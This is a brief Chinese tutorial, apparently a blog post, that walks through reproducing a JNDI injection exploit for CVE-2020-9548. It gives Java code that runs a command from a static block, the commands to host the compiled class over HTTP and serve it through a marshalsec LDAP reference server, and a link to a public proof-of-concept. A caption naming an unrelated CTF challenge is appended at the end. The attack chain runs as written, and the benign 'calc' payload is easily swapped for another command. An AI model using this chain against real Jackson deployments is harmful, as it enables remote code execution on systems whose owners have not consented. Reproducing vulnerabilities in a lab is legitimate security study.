1、编译Exploit.java
Java版本使用的是:
Exploit.java代码如下:
import java.lang.Runtime;
public class Exploit {
static {
try {
Runtime.getRuntime().exec("calc");
} catch (Exception e) {
e.printStackTrace();
}
}
}
对Exploit.java进行编译,会生成一个Exploit.class文件,见上图
2、搭建HTTP服务
使用Python搭建简易SimpleHTTPServer服务:
python2 -m SimpleHTTPServer 4444
3、搭建LDAP服务
使用marshalsec来启动一个LDAP服务:
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://127.0.0.1:4444/#Exploit 1099
4、下载poc测试
https://github.com/fairyming/CVE-2020-9548
测试成功
![[GYCTF2020]EasyThinking --不会编程的崽](https://img-blog.csdnimg.cn/direct/6c1edca7e7774c3ab70f19d7dd70c1e5.png)
